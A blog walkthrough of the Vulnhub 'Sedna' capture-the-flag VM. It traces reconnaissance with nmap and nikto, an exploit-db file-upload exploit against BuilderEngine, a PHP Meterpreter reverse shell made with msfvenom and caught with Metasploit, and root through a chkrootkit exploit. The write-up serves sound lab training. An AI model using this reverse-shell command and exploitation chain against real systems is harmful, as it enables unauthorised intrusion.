Hackfest2016: Sedna - VM Vulnhub.com


Sedna Vulnhub Machine Walkthrough

This is a vulnerable machine its created for the Hackfest 2016 CTF http://hackfest.ca/

Difficulty : Medium





Lets Start
This VM very kindly has the IP address already showing when you fire it up so I can skip the netdiscover , arp-scan and head straight to the NMAP scan to see what the VM has to offer.

Command : nmap -A 192.168.0.133
Nmap Results








I’ll make a note of all of them and (as usual) with these VM’s lets jump straight into the 80 http port and see what the website has to offer.
I’ll just run a nikto scan before heading over to the webiste, the output (if any) should make our reviewing more efficient.




Nikto findings (Interesting Results)








Cool, so it shows there’s a robots.txt file. Lets fire up firefox and take a look at the site and that robots.txt file.





Robots.txt file results








The robots file didn’t have anything useful in it. :-(
Ok so lets start looking a bit deeper into what the VM has to offer. I have seen nikto results , there is some list of directories:
192.168.0.133/files
192.168.0.133/license.txt
192.168.0.133/system
Cool check all files one by one, let’s see what the license file has to say.
Open the link [your-ip]/license.txt
Info Gathering Builder Engine (License File )









Cool 
OK, so it seems that the site uses BuilderEngine let’s see if we can get into that directory. OK so after checking the directory it does exist but I don’t have access to it. Let’s see if we can exploit the service. Heading over to exploit-db.com and searching for Builder Engine I get this.
Find Vulnerability in Exploit DB









Nice, so lets try it and see if we can upload a file.
Copy above code and replace your localhost in your Sedna machine ip.

Create HTML file









So after downloading the exploit and modifying the action attribute. I had to do a bit of Googling to find out how to get it to run, it was in front of me all the time. I just had to save it as a html file and open it in Firefox.





Open it on Firefox









Cool, it seems to have worked so far and it seems to be allowing me to upload a file that will get sent to the vulnerable directory on the web server. Let’s try and upload a standard php reverse shell.

Then I created a php reverse shell with msfvenom.
Command :
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.129 LPORT=4444 -f raw > shell.php
Created a PHP Shell








Uploaded the PHP file in below browse button.
Uploading Shell








After uploading the file I can see it has been uploaded and is sitting in the /files/ dir
Shell Uploaded Successfully









Open a metasploit and set a payload
Command :
set payload php/meterpreter/reverse_tcp
show options
Set LPORT : [ip]
exploit
Metasploit Session









Cool, OK now all thats left to do is click the file and see if I can get a shell back!! AGAIN





Click Shell.php file








After I requested the shell script, I had uploaded, I gained the reverse shell to VM.




Session Created WWOWW :)








BINGO, We’re in.

First flag was in the /var/www directory.




First Flag Found








Now it was time to escalate privileges. I had some unsuccessful exploit attempts with the kernel version. Then I looked for the /etc folder to find something to exploit to gain root access and I saw chkrootkit was installed.
Chkrootkit: chkrootkit (Check Rootkit) is a common Unix-based program intended to help system administrators check their system for known rootkits. It is a shell script using common UNIX/Linux tools like the strings and grep commands to search core system programs for signatures and for comparing a traversal of the /proc filesystem with the output of the ps (process status) command to look for discrepancies.




Find Chkrootkit








Yes! I could try this to exploit. So I background metasploit session and try to exploit a chkrootkit.
Chkrootkit Payload




 

After a while, I gained a new session with root.





Second Session created (Now Root :) )








Then I searched for flag.txt files.


@2nd Flag Found








Huge thanks for Viper for creating this VM. I really enjoyed it and feel I learnt so many new things from working through it. As always thanks to Vulnhub.com for hosting this and all the other amazing VM’s.
Hope you like it , If you have any queries … Feel free to contact me through linkedin or Twitter :)

Comments

Popular posts from this blog

D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting

D-Link DIR-615 Wireless Router —Vertical Privilege Escalation - CVE-2019–19743

OWASP Top 10 2017 — Web Application Security Risks